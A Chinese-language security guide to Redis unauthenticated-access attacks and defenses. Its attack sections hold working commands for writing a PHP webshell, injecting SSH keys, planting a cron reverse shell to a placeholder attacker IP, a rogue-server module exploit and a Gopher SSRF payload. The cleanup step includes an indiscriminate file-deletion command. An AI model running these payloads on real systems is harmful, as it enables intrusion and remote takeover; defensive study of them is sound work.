Redis未授权访问漏洞全解析:从SSRF到getshell的完整链条
Redis未授权访问漏洞深度剖析与实战防御指南
Redis作为高性能键值数据库的广泛应用,使其成为攻击者的重点目标。本文将系统性地剖析Redis未授权访问漏洞的完整攻击链条,从漏洞原理到多种攻击手法(包括SSRF利用、Gopher/Dict协议攻击、主从复制攻击等),并提供可落地的防御方案。无论您是渗透测试人员还是系统管理员,都能从中获得实战价值。
1. Redis未授权访问漏洞核心原理
Redis在设计之初将性能作为首要考量,默认配置存在以下安全隐患:
- 无认证机制:默认情况下无需密码即可连接,除非手动配置
requirepass参数 - 网络绑定策略:默认监听所有接口(0.0.0.0),暴露在公网风险极高
- 高危命令未禁用:CONFIG、SAVE等命令可修改关键配置
典型攻击路径分为三个阶段:
- 初始访问:通过暴露的6379端口建立未授权连接
- 权限提升:利用CONFIG命令修改持久化配置
- 持久化攻击:写入恶意文件(webshell/SSH密钥/计划任务)
关键配置参数风险说明:
dir:控制持久化文件存储路径dbfilename:决定持久化文件名protected-mode:3.2+版本的安全模式开关
2. 主流攻击手法全解析
2.1 WebShell写入技术
攻击条件:
- 已知目标Web目录绝对路径
- Redis以root权限运行
- 存在未授权访问或弱口令
典型操作流程:
redis-cli -h 目标IP config set dir /var/www/html config set dbfilename shell.php set payload "<?php system($_GET['cmd']);?>" save防御对策:
# Web服务器配置示例(禁止访问.rdb/.aof文件) location ~* \.(rdb|aof)$ { deny all; }2.2 SSH公钥注入攻击
技术原理: 通过写入authorized_keys文件实现免密登录,需要:
- 生成攻击者SSH密钥对
- 将公钥写入Redis
- 修改保存路径至
/root/.ssh/
关键命令:
ssh-keygen -t rsa -f attack_key (echo -e "\n\n"; cat attack_key.pub; echo -e "\n\n") > key.txt cat key.txt | redis-cli -h 目标IP -x set payload redis-cli -h 目标IP config set dir /root/.ssh redis-cli -h 目标IP config set dbfilename authorized_keys redis-cli -h 目标IP save防御方案:
# 修改SSH配置(/etc/ssh/sshd_config) PermitRootLogin prohibit-password StrictModes yes2.3 计划任务反弹Shell
系统差异:
| 系统类型 | 计划任务路径 | 文件权限要求 |
|---|---|---|
| CentOS | /var/spool/cron/ | 644 |
| Ubuntu | /var/spool/cron/crontabs/ | 600 |
攻击示例:
import redis r = redis.Redis(host='目标IP', port=6379) r.config_set('dir', '/var/spool/cron/') r.config_set('dbfilename', 'root') r.set('payload', '\n* * * * * bash -i >& /dev/tcp/攻击IP/端口 0>&1\n') r.save()防御建议:
# 监控cron目录文件变化 inotifywait -m /var/spool/cron -e create,modify3. 高级攻击手法剖析
3.1 主从复制攻击链
利用条件:
- Redis 4.x-5.0.5版本
- 主从复制功能启用
- root权限运行Redis
攻击步骤:
- 搭建恶意Redis服务器
- 通过
SLAVEOF命令设置主从关系 - 同步恶意.so模块文件
- 执行系统命令
工具使用示例:
python3 redis-rogue-server.py --rhost 目标IP --lhost 攻击IP --exp module.so3.2 SSRF结合协议攻击
协议对比:
| 协议类型 | 编码要求 | 适用场景 | 限制条件 |
|---|---|---|---|
| Gopher | URL编码 | 直接命令注入 | 需要协议支持 |
| Dict | 明文传输 | 信息探测、简单操作 | 不支持多行输入 |
Gopher攻击示例:
import urllib.parse payload = "config set dir /var/www/html\nconfig set dbfilename shell.php\nset payload '<?php phpinfo();?>'\nsave" gopher_url = "gopher://127.0.0.1:6379/_" + urllib.parse.quote(payload.replace("\n","\r\n"))4. 立体化防御体系构建
4.1 基础安全配置
redis.conf关键配置:
bind 127.0.0.1 requirepass 复杂密码 rename-command CONFIG "" rename-command FLUSHALL "" protected-mode yes dir /secured/redis/data/4.2 网络层防护
防火墙规则:
iptables -A INPUT -p tcp --dport 6379 -s 可信IP -j ACCEPT iptables -A INPUT -p tcp --dport 6379 -j DROP网络隔离:
- 将Redis部署在内网区域
- 使用跳板机管理访问
4.3 运行时防护
安全监控方案:
# 监控Redis关键命令执行 auditctl -w /usr/local/bin/redis-server -p x -k redis-commands # 文件完整性检查 aide --check4.4 应急响应流程
入侵识别:
- 检查异常Redis进程
- 分析
/var/log/redis/redis.log
处置措施:
# 立即断开网络 ifdown eth0 # 备份证据 redis-cli --rdb dump.rdb # 清除后门 find / -name "*.php" -mtime -1 -exec rm -f {} \;
5. 企业级安全实践建议
权限最小化:
useradd -r -s /bin/false redisuser chown -R redisuser:redisuser /var/lib/redis加密通信:
# redis.conf配置 tls-port 6379 tls-cert-file /path/to/redis.crt tls-key-file /path/to/redis.key安全审计工具:
- Redis-Audit:专项安全检测
- Lynis:系统级安全检查
- OSSEC:实时入侵检测
实际运维中发现,多数成功攻击都源于配置疏忽。曾遇到某企业因使用"redis"作为密码,导致攻击者通过暴力破解在15分钟内获取控制权。这提醒我们:密码复杂度与网络访问控制同样重要。